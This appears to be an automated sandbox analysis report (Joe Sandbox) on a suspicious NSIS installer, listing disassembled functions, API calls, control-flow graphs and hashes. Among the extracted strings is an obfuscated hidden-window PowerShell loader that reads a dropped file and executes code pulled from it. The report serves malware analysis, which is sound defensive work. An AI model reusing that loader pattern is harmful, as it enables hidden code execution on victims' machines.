                                      • Opcode ID: 98c6856de954bf32f67bc9aae575288044ef0a57168b27d926b9bae310f30c25
                                      • Instruction ID: 15b8319daa3a69dadbe16bc3493db081a7dc62ee607a685d27ecc12527328b4b
                                      • Opcode Fuzzy Hash: 98c6856de954bf32f67bc9aae575288044ef0a57168b27d926b9bae310f30c25
                                      • Instruction Fuzzy Hash: 785138B1A00208BFCF10DFA4C988A9D7BB5FF48319F20856AF515EB2D1DB799941CB54
                                      Function 00406344 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e28a8ad83f22bfe4c4d455a141f03dc38bf257c2203b46f6b1d5cba347f55b6d
                                      • Instruction ID: a8746b25a1c6b49bbeafbf020c2dfcaa04563a9eac1a8e827fb2969916571183
                                      • Opcode Fuzzy Hash: e28a8ad83f22bfe4c4d455a141f03dc38bf257c2203b46f6b1d5cba347f55b6d
                                      • Instruction Fuzzy Hash: 70F17670D00229CBCF18CFA8C8946ADBBB1FF44305F25816ED856BB281D7786A96CF44
                                      Function 00405FFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNELBASE(771B3410,00421558,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,0040589C,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 00406008
                                      • FindClose.KERNEL32(00000000), ref: 00406014
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp, xrefs: 00405FFD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp
                                      • API String ID: 2295610775-3559984709
                                      • Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                      • Instruction ID: 1297c1e42099762feae64532f60583430090df1d404adb2e37743a0561846f6f
                                      • Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                      • Instruction Fuzzy Hash: 8CD012319491206BC3105B38AD0C85B7A599F593317118A33F567F52F0C7788C7296E9
                                      Function 00403A0B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 179 403a0b-403a1d 180 403a23-403a29 179->180 181 403b5e-403b6d 179->181 180->181 182 403a2f-403a38 180->182 183 403bbc-403bd1 181->183 184 403b6f-403bb7 GetDlgItem * 2 call 403ede SetClassLongA call 40140b 181->184 185 403a3a-403a47 SetWindowPos 182->185 186 403a4d-403a50 182->186 188 403c11-403c16 call 403f2a 183->188 189 403bd3-403bd6 183->189 184->183 185->186 191 403a52-403a64 ShowWindow 186->191 192 403a6a-403a70 186->192 197 403c1b-403c36 188->197 194 403bd8-403be3 call 401389 189->194 195 403c09-403c0b 189->195 191->192 198 403a72-403a87 DestroyWindow 192->198 199 403a8c-403a8f 192->199 194->195 216 403be5-403c04 SendMessageA 194->216 195->188 196 403eab 195->196 204 403ead-403eb4 196->204 202 403c38-403c3a call 40140b 197->202 203 403c3f-403c45 197->203 205 403e88-403e8e 198->205 207 403a91-403a9d SetWindowLongA 199->207 208 403aa2-403aa8 199->208 202->203 212 403e69-403e82 DestroyWindow EndDialog 203->212 213 403c4b-403c56 203->213 205->196 210 403e90-403e96 205->210 207->204 214 403b4b-403b59 call 403f45 208->214 215 403aae-403abf GetDlgItem 208->215 210->196 218 403e98-403ea1 ShowWindow 210->218 212->205 213->212 219 403c5c-403ca9 call 405d1b call 403ede * 3 GetDlgItem 213->219 214->204 220 403ac1-403ad8 SendMessageA IsWindowEnabled 215->220 221 403ade-403ae1 215->221 216->204 218->196 249 403cb3-403cef ShowWindow KiUserCallbackDispatcher call 403f00 EnableWindow 219->249 250 403cab-403cb0 219->250 220->196 220->221 224 403ae3-403ae4 221->224 225 403ae6-403ae9 221->225 229 403b14-403b19 call 403eb7 224->229 226 403af7-403afc 225->226 227 403aeb-403af1 225->227 230 403b32-403b45 SendMessageA 226->230 232 403afe-403b04 226->232 227->230 231 403af3-403af5 227->231 229->214 230->214 231->229 235 403b06-403b0c call 40140b 232->235 236 403b1b-403b24 call 40140b 232->236 245 403b12 235->245 236->214 246 403b26-403b30 236->246 245->229 246->245 253 403cf1-403cf2 249->253 254 403cf4 249->254 250->249 255 403cf6-403d24 GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403d26-403d37 SendMessageA 255->256 257 403d39 255->257 258 403d3f-403d78 call 403f13 call 405cf9 lstrlenA call 405d1b SetWindowTextA call 401389 256->258 257->258 258->197 267 403d7e-403d80 258->267 267->197 268 403d86-403d8a 267->268 269 403da9-403dbd DestroyWindow 268->269 270 403d8c-403d92 268->270 269->205 272 403dc3-403df0 CreateDialogParamA 269->272 270->196 271 403d98-403d9e 270->271 271->197 273 403da4 271->273 272->205 274 403df6-403e4d call 403ede GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 272->274 273->196 274->196 279 403e4f-403e62 ShowWindow call 403f2a 274->279 281 403e67 279->281 281->205
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A47
                                      • ShowWindow.USER32(?), ref: 00403A64
                                      • DestroyWindow.USER32 ref: 00403A78
                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A94
                                      • GetDlgItem.USER32(?,?), ref: 00403AB5
                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AC9
                                      • IsWindowEnabled.USER32(00000000), ref: 00403AD0
                                      • GetDlgItem.USER32(?,00000001), ref: 00403B7E
                                      • GetDlgItem.USER32(?,00000002), ref: 00403B88
                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403BA2
                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403BF3
                                      • GetDlgItem.USER32(?,00000003), ref: 00403C99
                                      • ShowWindow.USER32(00000000,?), ref: 00403CBA
                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CCC
                                      • EnableWindow.USER32(?,?), ref: 00403CE7
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CFD
                                      • EnableMenuItem.USER32(00000000), ref: 00403D04
                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D1C
                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D2F
                                      • lstrlenA.KERNEL32(Concrescences Setup: Completed,?,Concrescences Setup: Completed,00422F00), ref: 00403D58
                                      • SetWindowTextA.USER32(?,Concrescences Setup: Completed), ref: 00403D67
                                      • ShowWindow.USER32(?,0000000A), ref: 00403E9B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                      • String ID: Concrescences Setup: Completed
                                      • API String ID: 3282139019-732904307
                                      • Opcode ID: 3ac918ef0a42e48e667534ebe08b1c5e2c6f4e88b6f53ea8c8a8fe3e2e231469
                                      • Instruction ID: e8e4c14712e0ebd1bd3c96694815290efe84e81baa174b168cbdfcdac135d6c4
                                      • Opcode Fuzzy Hash: 3ac918ef0a42e48e667534ebe08b1c5e2c6f4e88b6f53ea8c8a8fe3e2e231469
                                      • Instruction Fuzzy Hash: 29C1DF71A04205BBDB20AF61EE45E2B3E7CFB45706B40453EF601B11E1C779A942AB6E
                                      Function 00403679 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 282 403679-403691 call 406092 285 403693-4036a3 call 405c57 282->285 286 4036a5-4036d6 call 405be0 282->286 295 4036f9-403722 call 40393e call 405859 285->295 291 4036d8-4036e9 call 405be0 286->291 292 4036ee-4036f4 lstrcatA 286->292 291->292 292->295 300 403728-40372d 295->300 301 4037a9-4037b1 call 405859 295->301 300->301 302 40372f-403753 call 405be0 300->302 307 4037b3-4037ba call 405d1b 301->307 308 4037bf-4037e4 LoadImageA 301->308 302->301 309 403755-403757 302->309 307->308 311 403865-40386d call 40140b 308->311 312 4037e6-403816 RegisterClassA 308->312 313 403768-403774 lstrlenA 309->313 314 403759-403766 call 405796 309->314 326 403877-403882 call 40393e 311->326 327 40386f-403872 311->327 315 403934 312->315 316 40381c-403860 SystemParametersInfoA CreateWindowExA 312->316 320 403776-403784 lstrcmpiA 313->320 321 40379c-4037a4 call 40576b call 405cf9 313->321 314->313 319 403936-40393d 315->319 316->311 320->321 325 403786-403790 GetFileAttributesA 320->325 321->301 330 403792-403794 325->330 331 403796-403797 call 4057b2 325->331 335 403888-4038a2 ShowWindow call 406024 326->335 336 40390b-40390c call 404fe4 326->336 327->319 330->321 330->331 331->321 343 4038a4-4038a9 call 406024 335->343 344 4038ae-4038c0 GetClassInfoA 335->344 339 403911-403913 336->339 341 403915-40391b 339->341 342 40392d-40392f call 40140b 339->342 341->327 345 403921-403928 call 40140b 341->345 342->315 343->344 348 4038c2-4038d2 GetClassInfoA RegisterClassA 344->348 349 4038d8-4038fb DialogBoxParamA call 40140b 344->349 345->327 348->349 353 403900-403909 call 4035c9 349->353 353->319
                                      APIs
                                        • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
                                        • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                      • lstrcatA.KERNEL32(1033,Concrescences Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Concrescences Setup: Completed,00000000,00000002,771B3410,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\anziOUzZJs.exe",00000000), ref: 004036F4
                                      • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe,1033,Concrescences Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Concrescences Setup: Completed,00000000,00000002,771B3410), ref: 00403769
                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 0040377C
                                      • GetFileAttributesA.KERNEL32(: Completed), ref: 00403787
                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe), ref: 004037D0
                                        • Part of subcall function 00405C57: wsprintfA.USER32 ref: 00405C64
                                      • RegisterClassA.USER32(00422EA0), ref: 0040380D
                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403825
                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040385A
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403890
                                      • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004038BC
                                      • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004038C9
                                      • RegisterClassA.USER32(00422EA0), ref: 004038D2
                                      • DialogBoxParamA.USER32(?,00000000,00403A0B,00000000), ref: 004038F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe$Concrescences Setup: Completed$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                      • API String ID: 1975747703-2523469666
                                      • Opcode ID: 5c13432dcba976acc153c6c4cb0ae4a4ceee92b52a3611d71cd5da1aeea12791
                                      • Instruction ID: cdcda0c5d6d895e27caec97b3fe99e3f57ebd92391a3aca4eab7d54baf018be6
                                      • Opcode Fuzzy Hash: 5c13432dcba976acc153c6c4cb0ae4a4ceee92b52a3611d71cd5da1aeea12791
                                      • Instruction Fuzzy Hash: FA61C8B16442007ED620BF669D45F373AACEB44759F40447FF941B22E2C77CAD029A2D
                                      Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 356 402c66-402cb4 GetTickCount GetModuleFileNameA call 40596c 359 402cc0-402cee call 405cf9 call 4057b2 call 405cf9 GetFileSize 356->359 360 402cb6-402cbb 356->360 368 402cf4 359->368 369 402ddb-402de9 call 402c02 359->369 361 402e98-402e9c 360->361 371 402cf9-402d10 368->371 375 402deb-402dee 369->375 376 402e3e-402e43 369->376 373 402d12 371->373 374 402d14-402d1d call 40307b 371->374 373->374 383 402d23-402d2a 374->383 384 402e45-402e4d call 402c02 374->384 378 402df0-402e08 call 403091 call 40307b 375->378 379 402e12-402e3c GlobalAlloc call 403091 call 402e9f 375->379 376->361 378->376 407 402e0a-402e10 378->407 379->376 405 402e4f-402e60 379->405 385 402da6-402daa 383->385 386 402d2c-402d40 call 405927 383->386 384->376 393 402db4-402dba 385->393 394 402dac-402db3 call 402c02 385->394 386->393 403 402d42-402d49 386->403 396 402dc9-402dd3 393->396 397 402dbc-402dc6 call 406107 393->397 394->393 396->371 404 402dd9 396->404 397->396 403->393 409 402d4b-402d52 403->409 404->369 410 402e62 405->410 411 402e68-402e6d 405->411 407->376 407->379 409->393 412 402d54-402d5b 409->412 410->411 413 402e6e-402e74 411->413 412->393 414 402d5d-402d64 412->414 413->413 415 402e76-402e91 SetFilePointer call 405927 413->415 414->393 416 402d66-402d86 414->416 419 402e96 415->419 416->376 418 402d8c-402d90 416->418 420 402d92-402d96 418->420 421 402d98-402da0 418->421 419->361 420->404 420->421 421->393 422 402da2-402da4 421->422 422->393
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402C77
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\anziOUzZJs.exe,00000400), ref: 00402C93
                                        • Part of subcall function 0040596C: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 00405970
                                        • Part of subcall function 0040596C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992
                                      • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\anziOUzZJs.exe,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 00402CDF
                                      Strings
                                      • "C:\Users\user\Desktop\anziOUzZJs.exe", xrefs: 00402C66
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C6D
                                      • C:\Users\user\Desktop\anziOUzZJs.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                      • Null, xrefs: 00402D5D
                                      • soft, xrefs: 00402D54
                                      • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                      • Inst, xrefs: 00402D4B
                                      • Error launching installer, xrefs: 00402CB6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\anziOUzZJs.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                      • API String ID: 4283519449-3613515333
                                      • Opcode ID: 3f665217ac2245ad92c498c6fa1e551097c863ebe5e03bc44dd447b4a8322165
                                      • Instruction ID: 1839f4375b44da3097aca9d4a8c6c84b0463c2d100b7a2d698c12080187f488f
                                      • Opcode Fuzzy Hash: 3f665217ac2245ad92c498c6fa1e551097c863ebe5e03bc44dd447b4a8322165
                                      • Instruction Fuzzy Hash: BF51B6B1A41214ABDF109F65DE89B9E7AB4EF00355F14403BF904B62D1C7BC9E418B9D
                                      Function 00401751 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 554 401751-401774 call 402a3a call 4057d8 559 401776-40177c call 405cf9 554->559 560 40177e-401790 call 405cf9 call 40576b lstrcatA 554->560 565 401795-40179b call 405f64 559->565 560->565 570 4017a0-4017a4 565->570 571 4017a6-4017b0 call 405ffd 570->571 572 4017d7-4017da 570->572 579 4017c2-4017d4 571->579 580 4017b2-4017c0 CompareFileTime 571->580 573 4017e2-4017fe call 40596c 572->573 574 4017dc-4017dd call 405947 572->574 582 401800-401803 573->582 583 401876-40189f call 404f12 call 402e9f 573->583 574->573 579->572 580->579 584 401805-401847 call 405cf9 * 2 call 405d1b call 405cf9 call 4054ef 582->584 585 401858-401862 call 404f12 582->585 595 4018a1-4018a5 583->595 596 4018a7-4018b3 SetFileTime 583->596 584->570 617 40184d-40184e 584->617 597 40186b-401871 585->597 595->596 599 4018b9-4018c4 FindCloseChangeNotification 595->599 596->599 600 4028d8 597->600 602 4018ca-4018cd 599->602 603 4028cf-4028d2 599->603 604 4028da-4028de 600->604 607 4018e2-4018e5 call 405d1b 602->607 608 4018cf-4018e0 call 405d1b lstrcatA 602->608 603->600 614 4018ea-402273 call 4054ef 607->614 608->614 614->603 614->604 617->597 619 401850-401851 617->619 619->585
                                      APIs
                                      • lstrcatA.KERNEL32(00000000,00000000,CreateTimer,C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe,00000000,00000000,00000031), ref: 00401790
                                      • CompareFileTime.KERNEL32(-00000014,?,CreateTimer,CreateTimer,00000000,00000000,CreateTimer,C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe,00000000,00000000,00000031), ref: 004017BA
                                        • Part of subcall function 00405CF9: lstrcpynA.KERNEL32(?,?,00000400,00403187,00422F00,NSIS Error), ref: 00405D06
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                        • Part of subcall function 00404F12: lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
                                        • Part of subcall function 00404F12: SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"$C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe$C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp$C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp\nsDialogs.dll$CreateTimer
                                      • API String ID: 1941528284-3015429203
                                      • Opcode ID: 717bbc974399765322aab804ce65b0cd2922970306079a4e6ebe60fbc67e86b2
                                      • Instruction ID: dfa66b7161a0f16b13ad00a25904a83b243dedeb6ee7557d1be3b523159fd244
                                      • Opcode Fuzzy Hash: 717bbc974399765322aab804ce65b0cd2922970306079a4e6ebe60fbc67e86b2
                                      • Instruction Fuzzy Hash: 5641D572910515BACF107BB5CC85EAF3679EF45329B20823BF521F20E2D63C4A419B6D
                                      Function 00404F12 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 621 404f12-404f27 622 404fdd-404fe1 621->622 623 404f2d-404f3f 621->623 624 404f41-404f45 call 405d1b 623->624 625 404f4a-404f56 lstrlenA 623->625 624->625 626 404f73-404f77 625->626 627 404f58-404f68 lstrlenA 625->627 630 404f86-404f8a 626->630 631 404f79-404f80 SetWindowTextA 626->631 627->622 629 404f6a-404f6e lstrcatA 627->629 629->626 632 404fd0-404fd2 630->632 633 404f8c-404fce SendMessageA * 3 630->633 631->630 632->622 634 404fd4-404fd7 632->634 633->632 634->622
                                      APIs
                                      • lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                      • lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                      • lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
                                      • SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                      Strings
                                      Memory Dump Source
